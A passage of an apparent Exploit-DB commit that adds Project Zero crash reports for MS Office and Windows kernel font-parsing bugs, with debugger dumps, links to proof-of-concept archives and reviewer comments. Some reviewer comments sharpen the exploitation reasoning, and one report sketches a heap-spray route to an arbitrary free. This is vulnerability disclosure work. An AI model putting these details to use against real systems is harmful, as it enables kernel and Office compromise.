0012d4a8 31497d09 0da3e9c0 0001a1ab 3211f0e4 wwlib!DllGetLCID+0x23858
0012d830 31498500 3211e7e0 80000001 0001a1ab wwlib!DllGetLCID+0x23433
0012dcac 6bdd1fb9 3211e7e0 0012dd4c 0012dd08 wwlib!DllGetLCID+0x23c2a
0012dd70 6bddfb4b 021aeec4 0012df80 0012ddac MSPTLS!LssbFIsSublineEmpty+0x2501
0012dd80 6bddff92 00000000 0012dfa4 0012df7c MSPTLS!LssbFIsSublineEmpty+0x10093
3128d54a 2bc8 sub ecx,eax
3128d54c 8dbc86ac050000 lea edi,[esi+eax*4+5ACh]
3128d553 8b45f4 mov eax,dword ptr [ebp-0Ch]
3128d556 41 inc ecx
=> 3128d557 f3ab rep stos dword ptr es:[edi]
3128d559 837deeff cmp dword ptr [ebp-12h],0FFFFFFFFh ss:0023:0012cae6=00019427
To exploit this bug an attacker must spray memory until virtual address 0x00019000 is reserved and committed into the running process. Then, at offset 0x910 in that page the attacker must place any address he or she wishes to free. This will lead to an exploitable arbitrary free vulnerability.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37912.zip
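Review bot: "did not require Word to be be closed" has a doubled "be". The explanation of where 00019910 comes from is thinner than the listing allows: it is the fill value of "rep stos dword ptr es:[edi]" (eax loaded from the stack local [ebp-0Ch] at 3128d553), and the register dump after the loop shows edi=0da3ef98 against esi=0da3e9c0, a difference of 0x5d8, so the last dword the loop wrote is exactly [esi+5d4], the field the report says is later read back as the pointer passed to MsoFreePv. Spelling out that the freed "pointer" is a non-pointer field overwritten by this fill, and what [ebp-0Ch] holds, is the crux of the arbitrary-free claim and should be in the text. The kb output is also placed between the register dump and the disassembly it annotates; moving it after the listing would keep the register state next to the instructions.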

platforms/windows/dos/37913.txt Executable file

@ -0,0 +1,67 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=414&can=1
The following crash was observed in MS Office 2007 running under Windows 2003 x86. Microsoft Office File Validation Add-In is disabled and application verified was enabled for testing and reproduction. This sample did not reproduce in Office 2010 running on Windows 7 x86.
The attached minimized PoC that produces the crash with 2 bit changes from the original file at offsets 0x11E60 and 0x1515F. Standard office document parsers did not reveal any significance about this location.
Attached files:
Fuzzed minimized PoC: 1567070353_min.doc
Fuzzed non-minimized PoC: 1567070353_crash.doc
Original non-fuzzed file: 1567070353_orig.doc
DLL Versions:
mso.dll: 12.0.6721.5000
wwlib.dll: 12.0.6720.5000
Observed Crash:
eax=00000001 ebx=00000004 ecx=0189ff18 edx=00000019 esi=32646a30 edi=0db0eff8
eip=32fbca76 esp=0012bc98 ebp=0012bcb8 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
32fbca73 8b7df8 mov edi,dword ptr [ebp-8]
=> 32fbca76 f6470201 test byte ptr [edi+2],1 ds:0023:0db0effa=??
32fbca7a 7419 je mso!Ordinal2690+0x476 (32fbca95)
32fbca7c 833e07 cmp dword ptr [esi],7
32fbca7f 7414 je mso!Ordinal2690+0x476 (32fbca95)
32fbca81 8b4508 mov eax,dword ptr [ebp+8]
32fbca84 6a20 push 20h
32fbca86 ff7010 push dword ptr [eax+10h]
32fbca89 8d4dfc lea ecx,[ebp-4]
32fbca8c 51 push ecx
32fbca8d ff10 call dword ptr [eax]
32fbca8f 8127fffffeff and dword ptr [edi],0FFFEFFFFh
Stack Trace:
0:000> kb 8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012bcb8 32fbcdc3 0012be28 0d9f4fe8 00000000 mso!Ordinal2690+0x457
0012bccc 32fbce5b 0012be28 0d9f4fe8 0012be28 mso!Ordinal2690+0x7a4
0012bd20 32fbc93e 0012be28 0d9f4fe8 0ddceeb8 mso!Ordinal2690+0x83c
0012bd74 32fbcd73 0012be28 0d9f4fe8 0db2f45a mso!Ordinal2690+0x31f
0012bd94 316dfe8f 0dbe8e38 0012be28 317e9c10 mso!Ordinal2690+0x754
0012bdb0 317e9aa4 0012be08 00000000 00000000 wwlib!wdCommandDispatch+0xcd37
0012bde4 31980e8d 0012be08 000000b4 038b78bc wwlib!wdCommandDispatch+0x11694c
0012c07c 31980b0f 0db2c9c0 00000000 00000001 wwlib!wdCommandDispatch+0x2add35
In this crash the value being dereferenced in edi is free-ed memory:
0:000> !heap -p -a 0xdb0eff8
address 0db0eff8 found in
_DPH_HEAP_ROOT @ 1151000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
d9e5240: db0e000 2000
7c83e330 ntdll!RtlFreeHeap+0x0000011a
0189fe9c vfbasics!AVrfpRtlFreeHeap+0x000000f8
331039d5 mso!Ordinal1743+0x00002d4d
329c91d1 mso!MsoFreePv+0x0000003f
329c913c mso!Ordinal519+0x00000017
32a54dcc mso!Ordinal320+0x00000021
32bb6f2e mso!Ordinal379+0x00000eae
There is a 1-bit clear at the location specified by edi shortly after the faulting eip location as well making this an exploitable condition.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37913.zip
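Review bot: "application verified was enabled" should read "Application Verifier was enabled" (as the sibling reports put it), and "The attached minimized PoC that produces the crash with 2 bit changes" is a fragment; drop "that". The exploitability claim in the last sentence ("There is a 1-bit clear at the location specified by edi") would be more precise if it named the instruction: "and dword ptr [edi],0FFFEFFFFh" at 32fbca8f clears bit 16 of the first dword of the freed chunk, and it is reached only when neither "je mso!Ordinal2690+0x476" at 32fbca7a/32fbca7f is taken, which is what turns the use-after-free read into a write.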

platforms/windows/dos/37914.txt Executable file

@ -0,0 +1,77 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=402&can=1
We have encountered a Windows kernel crash in the win32k!fsc_BLTHoriz function while processing corrupted TTF font files, such as:
---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fbde5000, memory referenced
Arg2: 00000001, value 0 = read operation, 1 = write operation
Arg3: 8209f076, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
WRITE_ADDRESS: GetPointerFromAddress: unable to read from 8279284c
Unable to read MiSystemVaType memory at 82771f00
fbde5000
FAULTING_IP:
win32k!fsc_BLTHoriz+37
8209f076 0908 or dword ptr [eax],ecx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD6
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 8209c56b to 8209f076
STACK_TEXT:
8943f600 8209c56b fbde4fe0 000000d8 8943f6b8 win32k!fsc_BLTHoriz+0x37
8943f638 820b45f5 fbde4fe0 00000002 fffffffe win32k!fsc_FillBitMap+0xe7
8943f698 820b3eb2 ff6df874 50000061 00000002 win32k!fsc_FillGlyph+0x45e
8943f6e8 820b9ca7 ff6df010 ff6df07c fbc74f24 win32k!fs_ContourScan+0x55d
8943f82c 820aec63 00000014 0000007f 8943f918 win32k!lGetGlyphBitmap+0x179
8943f850 820aeab6 00000000 00000001 0000007f win32k!ttfdQueryFontData+0x158
8943f8a0 820adce2 ff7af010 fbc74cf0 00000001 win32k!ttfdSemQueryFontData+0x45
8943f8e8 820b3774 ff7af010 fbc74cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8943f960 8212bc8d 8943fc3c fc5e4bd4 ff6d57e8 win32k!xInsertMetricsPlusRFONTOBJ+0x120
8943f990 820a594d 00000008 ff7bf030 8943fcd6 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8943f9c8 8212b78b 8943fc1c 8943fc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8943fa0c 820a55d0 8943fcd0 00000008 8943fc1c win32k!ESTROBJ::vInit+0x268
8943fc2c 820a5793 00000000 8943fcd0 fbc74cf0 win32k!GreGetTextExtentExW+0x12a
8943fd0c 82665896 030102cd 00710bb0 00000008 win32k!NtGdiGetTextExtentExW+0x141
8943fd0c 773f70f4 030102cd 00710bb0 00000008 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0027f6cc 00000000 00000000 00000000 00000000 0x773f70f4
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "fpgm", "hmtx" and "maxp" tables.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!fsc_RemoveDups or another location in kernel space. Interestingly, the crash occurs in different win32k.sys functions depending on the operating system:
Windows 7 32-bit: win32k!fsc_BLTHoriz
Windows 7 64-bit: win32k!fsc_MeasureGlyph
Windows 8 32-bit: win32k!fsg_CopyFontProgramResults
In order to reproduce the problem with the provided sample, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept font file together with the corresponding kernel crash log.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37914.zip
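Review bot: The reproduction paragraph says "The issue reproduces on Windows 7 and 8.1" but the per-platform list below it names "Windows 8 32-bit: win32k!fsg_CopyFontProgramResults"; align the version (8 vs 8.1). The same paragraph also says a default installation may crash "in win32k!fsc_RemoveDups or another location in kernel space", which is the faulting function of the companion report (issue 401, win32k!fsc_RemoveDups) and appears there word for word, whereas this report's own crash is in win32k!fsc_BLTHoriz; either replace it with the function observed for this sample or state that the crash site varies with Special Pools on or off.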

platforms/windows/dos/37915.txt Executable file

@ -0,0 +1,70 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=401&can=1
We have encountered a Windows kernel crash in the win32k!fsc_RemoveDups function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6e7000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91e809df, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8277c84c
Unable to read MiSystemVaType memory at 8275bf00
ff6e7000
FAULTING_IP:
win32k!fsc_RemoveDups+85
91e809df 3918 cmp dword ptr [eax],ebx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91e8015c to 91e809df
STACK_TEXT:
969e3624 91e8015c 969e3858 fbff0e78 0000002b win32k!fsc_RemoveDups+0x85
969e36cc 91e89979 ff6de010 ff6de07c 00000001 win32k!fs_FindBitMapSize+0x2de
969e36e8 91e89b59 fbff0e78 0000002b 00000001 win32k!bGetGlyphMetrics+0x39
969e382c 91e7ec63 fbff0e78 0000002b 969e3918 win32k!lGetGlyphBitmap+0x2b
969e3850 91e7eab6 00000000 00000001 0000002b win32k!ttfdQueryFontData+0x158
969e38a0 91e7dce2 ff7af010 fbe0ccf0 00000001 win32k!ttfdSemQueryFontData+0x45
969e38e8 91e83774 ff7af010 fbe0ccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
969e3960 91efbc8d 969e3c3c fbe2cc94 ff713154 win32k!xInsertMetricsPlusRFONTOBJ+0x120
969e3990 91e7594d 0000000a ff7bf000 969e3cd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
969e39c8 91efb78b 969e3c1c 969e3c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
969e3a0c 91e755d0 969e3cd0 0000000a 969e3c1c win32k!ESTROBJ::vInit+0x268
969e3c2c 91e75793 00000000 969e3cd0 fbe0ccf0 win32k!GreGetTextExtentExW+0x12a
969e3d0c 8264f896 0701015e 02bb0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
969e3d0c 779670f4 0701015e 02bb0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0015f434 00000000 00000000 00000000 00000000 0x779670f4
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!fsc_RemoveDups or another location in kernel space. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept font file together with the corresponding kernel crash log.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37915.zip

platforms/windows/dos/37916.txt Executable file

@ -0,0 +1,69 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=392&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5)
Memory was referenced after it was freed.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ff404e04, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 9194bf53, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8276e84c
Unable to read MiSystemVaType memory at 8274df00
ff404e04
FAULTING_IP:
ATMFD+bf53
9194bf53 8a18 mov bl,byte ptr [eax]
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD5
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 919477af to 9194bf53
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
9806b938 919477af 099e0403 fbfe2cf0 00000001 ATMFD+0xbf53
9806ba40 91943fe1 00000001 9806ba64 099e04c7 ATMFD+0x77af
9806ba84 916adce2 ff7af010 fbfe2cf0 00000001 ATMFD+0x3fe1
9806bacc 916ade59 ff7af010 fbfe2cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
9806bb40 916ab971 00000002 9806bcf4 00000000 win32k!RFONTOBJ::bInitCache+0xd4
9806bbfc 91727bb0 9806bcdc 9806bca0 00000007 win32k!RFONTOBJ::bRealizeFont+0x5df
9806bca8 91727deb fc17cd80 00000000 00000002 win32k!RFONTOBJ::bInit+0x2e3
9806bcc0 917549a0 9806bcdc 00000000 00000002 win32k!RFONTOBJ::vInit+0x16
9806bcec 91754a59 fbfe2cf0 00000000 0980f8a5 win32k!GreGetFontUnicodeRanges+0x2d
9806bd24 82641896 0d01016e 00000000 0017fcc4 win32k!NtGdiGetFontUnicodeRanges+0x17
9806bd24 779970f4 0d01016e 00000000 0017fcc4 nt!KiSystemServicePostCall
0017fcc4 00000000 00000000 00000000 00000000 0x779970f4
---
The bugcheck is caused by an attempt to read memory from an unmapped address. Specifically, the function is responsible for parsing the FDSelect region, and the crashing instruction is responsible for checking the version byte (can be either 0 or 3). The reason of the bugcheck is the fact that the kernel doesn't perform any bounds checking against the 32-bit FDSelect offset specified in the Top DICT, key "12 37", and instead uses it directly as an index into a user-mode input data buffer. While invalid user-mode memory accesses are gracefully handled by ATMFD, the controlled offset can be set on 32-bit platforms such that it points into kernel space, thus resulting in a reproducible system bugcheck.
To our current knowledge, this condition can only lead to an out-of-bounds read, thus limiting the impact of the bug to remote denial of service, or potentially local kernel memory disclosure. However, we have not fully confirmed that the severity of the bug is not in fact more significant due to some further ATMFD logic we are not aware of.
The issue reproduces on reliably Windows 7 and 8.1. It is easiest to reproduce and possibly exploit on 32-bit versions of Windows, as the "buffer + 32-bit controlled offset" expression evaluates to a kernel-mode address, while on 64-bit platforms it remains in the user space area and therefore the exception is gracefully handled by the ATMFD.DLL exception handler.
Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37916.zip
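Review bot: grammar slip in the reproduction paragraph of this report, "The issue reproduces on reliably Windows 7 and 8.1." should read "The issue reproduces reliably on Windows 7 and 8.1.", and "The reason of the bugcheck" should be "The reason for the bugcheck". The same paragraph would be clearer with the platform qualifier up front, since the analysis itself explains that the bugcheck only materialises when "buffer + 32-bit controlled offset" lands in kernel space, i.e. on 32-bit builds, while on 64-bit the access stays in user space and is swallowed by the ATMFD.DLL exception handler; wording it as "reproduces reliably on 32-bit Windows 7 and 8.1; on 64-bit the fault is handled gracefully" would stop the entry being read as a denial of service on every build. The impact sentence ("limiting the impact of the bug to remote denial of service, or potentially local kernel memory disclosure") is hedged with "we have not fully confirmed"; that hedge belongs in a one-line summary at the top of the file so it is not lost on readers who stop after the crash log.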

platforms/windows/dos/37917.txt Executable file

@ -0,0 +1,69 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=386&can=1
We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:
---
DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5)
Memory was referenced after it was freed.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: fc937cdf, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 91d75195, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 827a784c
Unable to read MiSystemVaType memory at 82786f00
fc937cdf
FAULTING_IP:
ATMFD+35195
91d75195 803802 cmp byte ptr [eax],2
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0xD5
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91d7598d to 91d75195
STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
8ba91638 91d7598d 8ba91890 00af0000 8ba91890 ATMFD+0x35195
8ba91730 91d74ee4 8ba91890 00af0000 8ba9174c ATMFD+0x3598d
8ba91834 91d75044 8ba91890 00af0000 8ba91968 ATMFD+0x34ee4
8ba91868 91d4512a 00000000 8ba91890 00af0000 ATMFD+0x35044
8ba91908 91d4718f 00000004 00000001 00000002 ATMFD+0x512a
8ba91988 91d43c8e 00000000 00000000 98435600 ATMFD+0x718f
8ba91a6c 91a67a9a 00000004 fc97efc0 fc95eff8 ATMFD+0x3c8e
8ba91ab4 91a679ec 00000001 fc97efc0 fc95eff8 win32k!PDEVOBJ::LoadFontFile+0x3c
8ba91af4 91a6742d ffa66130 00000019 fc97efc0 win32k!vLoadFontFileView+0x291
8ba91b80 91a5641f 8ba91c58 00000019 00000001 win32k!PUBLIC_PFTOBJ::bLoadFonts+0x209
8ba91bcc 91a57403 8ba91c58 00000019 00000001 win32k!GreAddFontResourceWInternal+0xfb
8ba91d14 8267a896 000d3e78 00000019 00000001 win32k!NtGdiAddFontResourceW+0x142
8ba91d14 779c70f4 000d3e78 00000019 00000001 nt!KiSystemServicePostCall
002efa84 00000000 00000000 00000000 00000000 0x779c70f4
---
The bugcheck is caused by an attempt to read memory from an unmapped address. The specific expression being dereferenced by ATMFD.DLL is "base address of the Name INDEX data + NAME.offset[x] - 1", however no bounds checking is performed over the value of NAME.offset[x] before using it for pointer arithmetic. To our current knowledge, this condition can only lead to an out-of-bounds read, thus limiting the impact of the bug to remote denial of service, or potentially local kernel memory disclosure. However, we have not fully confirmed that the severity of the bug is not in fact more significant due to some further ATMFD logic we are not aware of.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.
Attached is an archive with three proof of concept font files together with corresponding kernel crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37917.zip
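Review bot: the bugcheck banner at the top of this report reads "Memory was referenced after it was freed" (0xD5, DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL), but the analysis attributes the crash to an unchecked offset in "base address of the Name INDEX data + NAME.offset[x] - 1"; one sentence reconciling the two (with Special Pool enabled the out-of-bounds pointer landed on a freed special-pool page, hence code 0xD5 rather than 0x50, and no use-after-free is being claimed) would keep readers from misfiling this as a UAF. The reproduction paragraph should also state the trigger path: the stack shows win32k!NtGdiAddFontResourceW -> PDEVOBJ::LoadFontFile -> ATMFD, so merely loading the font (AddFontResourceW) reaches the faulting "cmp byte ptr [eax],2", and no text-metric or rendering call is needed, unlike the scl_ApplyTranslation report further down in this commit, which asks for a custom glyph-rendering program.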

platforms/windows/dos/37918.txt Executable file

@ -0,0 +1,134 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=370&can=1
We have encountered a number of Windows kernel crashes in the win32k!scl_ApplyTranslation function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6c7000, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 94860935, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
[...]
FAULTING_IP:
win32k!scl_ApplyTranslation+9b
94860935 011487 add dword ptr [edi+eax*4],edx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 94862292 to 94860935
STACK_TEXT:
8ad915ec 94862292 00000001 00000000 00000000 win32k!scl_ApplyTranslation+0x9b
8ad91610 9485f419 ff6ae250 ff6b24d8 ff6ae2c4 win32k!fsg_GridFit+0xdd
8ad91688 9486906c 00000001 8ad916a4 94868fc3 win32k!fs__Contour+0x287
8ad91694 94868fc3 ff6ae010 ff6ae07c 8ad916c0 win32k!fs_ContourGridFit+0x12
8ad916a4 9486991f ff6ae010 ff6ae07c 000000a4 win32k!fs_NewContourGridFit+0x10
8ad916c0 94869960 fc380e78 000000a4 8ad916fc win32k!bGetGlyphOutline+0xd7
8ad916e8 94869b59 fc380e78 000000a4 00000001 win32k!bGetGlyphMetrics+0x20
8ad9182c 9485ec63 fc380e78 000000a4 8ad91918 win32k!lGetGlyphBitmap+0x2b
8ad91850 9485eab6 00000000 00000001 000000a4 win32k!ttfdQueryFontData+0x158
8ad918a0 9485dce2 ff7af010 fbb4acf0 00000001 win32k!ttfdSemQueryFontData+0x45
8ad918e8 94863774 ff7af010 fbb4acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
8ad91960 948dbc8d 8ad91c3c fba6cd68 ff6deca8 win32k!xInsertMetricsPlusRFONTOBJ+0x120
8ad91990 9485594d 0000000a ff7bf090 8ad91ce2 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
8ad919c8 948db78b 8ad91c1c 8ad91c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
8ad91a0c 948555d0 8ad91cd0 0000000a 8ad91c1c win32k!ESTROBJ::vInit+0x268
8ad91c2c 94855793 00000000 8ad91cd0 fbb4acf0 win32k!GreGetTextExtentExW+0x12a
8ad91d0c 82645896 03010292 007c0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
8ad91d0c 772470f4 03010292 007c0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0021f9ac 00000000 00000000 00000000 00000000 0x772470f4
---
Depending on the malformed font file, the crashes are triggered at various locations in the win32k!scl_ApplyTranslation function:
win32k!scl_ApplyTranslation+43
win32k!scl_ApplyTranslation+9b
The crashes always occur while trying to access memory outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow, potentially allowing for remote code execution in the context of the Windows kernel. While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "maxp" and "hmtx" tables.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!scl_ApplyTranslation or another location in kernel space, as caused by the corrupted pool state, depending on the specific testcase used. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is an archive with three proof of concept font files together with corresponding kernel crash logs.
---------------------------------------------------------------------------------------------------------------------------------------------
While performing further analysis of some of the offending samples, we have found that sometimes buffers and structures in the pools align such that this condition causes an overwrite of function pointers residing in the font's fnt_GlobalGraphicStateType structure, consequently leading to crashes at invalid EIPs when one of these pointers is subsequently called. Several crashes such as the one shown below have been reproduced on Windows 7 32-bit with Special Pools enabled for win32k.sys:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: c1c00dc1, memory referenced.
Arg2: 00000008, value 0 = read operation, 1 = write operation.
Arg3: c1c00dc1, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000002, (reserved)
[...]
FAULTING_IP:
+0
c1c00dc1 ?? ???
MM_INTERNAL_CODE: 2
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 9224a9cc to c1c00dc1
STACK_TEXT:
WARNING: Frame IP not in any known module. Following frames may be wrong.
994574b4 9224a9cc 99457504 fb5a2efc fb5a2e94 0xc1c00dc1
994574c8 92244483 00000000 00000001 00000001 win32k!scl_CalcComponentOffset+0x21
99457538 92261ef8 00000800 fb5a2e94 fb5a2e94 win32k!fsg_MergeGlyphData+0x12a
99457574 9226238c fb5a2250 fb5a2f1c fb5a348c win32k!fsg_ExecuteGlyph+0x268
994575d0 92262202 fb5a2250 fb5a348c fb5a2ddc win32k!fsg_CreateGlyphData+0xea
99457610 9225f419 fb5a2250 fb5a348c fb5a22c4 win32k!fsg_GridFit+0x4d
99457688 9226906c 00000000 994576a4 92268fc3 win32k!fs__Contour+0x287
99457694 92268fc3 fb5a2010 fb5a207c 994576c0 win32k!fs_ContourGridFit+0x12
994576a4 9226991f fb5a2010 fb5a207c 00000080 win32k!fs_NewContourGridFit+0x10
994576c0 92269960 fbc5ee78 00000080 994576fc win32k!bGetGlyphOutline+0xd7
994576e8 92269b59 fbc5ee78 00000080 00000001 win32k!bGetGlyphMetrics+0x20
9945782c 9225ec63 fbc5ee78 00000080 99457918 win32k!lGetGlyphBitmap+0x2b
99457850 9225eab6 00000000 00000001 00000080 win32k!ttfdQueryFontData+0x158
994578a0 9225dce2 ff7af010 fe37ecf0 00000001 win32k!ttfdSemQueryFontData+0x45
994578e8 92263774 ff7af010 fe37ecf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
99457960 922dbc8d 99457c3c fbc2ebd8 ff6687fc win32k!xInsertMetricsPlusRFONTOBJ+0x120
99457990 9225594d 00000008 ff7bf040 99457cd8 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
994579c8 922db78b 99457c1c 99457c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
99457a0c 922555d0 99457cd0 00000008 99457c1c win32k!ESTROBJ::vInit+0x268
99457c2c 92255793 00000000 99457cd0 fe37ecf0 win32k!GreGetTextExtentExW+0x12a
99457d0c 82646896 060102a1 00150bb0 00000008 win32k!NtGdiGetTextExtentExW+0x141
99457d0c 77a070f4 060102a1 00150bb0 00000008 nt!KiSystemServicePostCall
0028f27c 00000000 00000000 00000000 00000000 0x77a070f4
---
I am attaching another archive with further 3 samples triggering crashes at invalid EIPs (as called by win32k!scl_CalcComponentOffset) on my test environment, together with corresponding crash logs.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37918.zip
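Review bot: the reproduction note says "it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes", but the hunk neither ships that program nor names the calls it makes; both stack traces enter the kernel through win32k!NtGdiGetTextExtentExW -> ESTROBJ::vInit -> RFONTOBJ::bGetGlyphMetricsPlus, so a text-extent query over the glyph set (the user-mode GetTextExtentExPointW family) at several point sizes is what is actually required, and saying so, or including the harness in the archive, would make the repro deterministic. The second half of the file (after the dashed separator) is a follow-up comment that mentions "another archive with further 3 samples", yet the file carries a single Proof of Concept link; say whether 37918.zip holds both the original three and the later three samples. Minor: the claim that the crashes "always occur while trying to access memory outside of a dynamically allocated destination buffer, leading to a pool-based buffer overflow" is well supported by "Arg2: 00000001, value 0 = read operation, 1 = write operation" on "add dword ptr [edi+eax*4],edx"; quoting that write flag next to the claim makes the overflow (as opposed to an over-read) evident at a glance.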

platforms/windows/dos/37919.txt Executable file

@ -0,0 +1,91 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=368&can=1
We have encountered a number of Windows kernel crashes in the win32k!itrp_IUP function (a handler of the IUP[] TTF program instruction) while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6895b8, memory referenced.
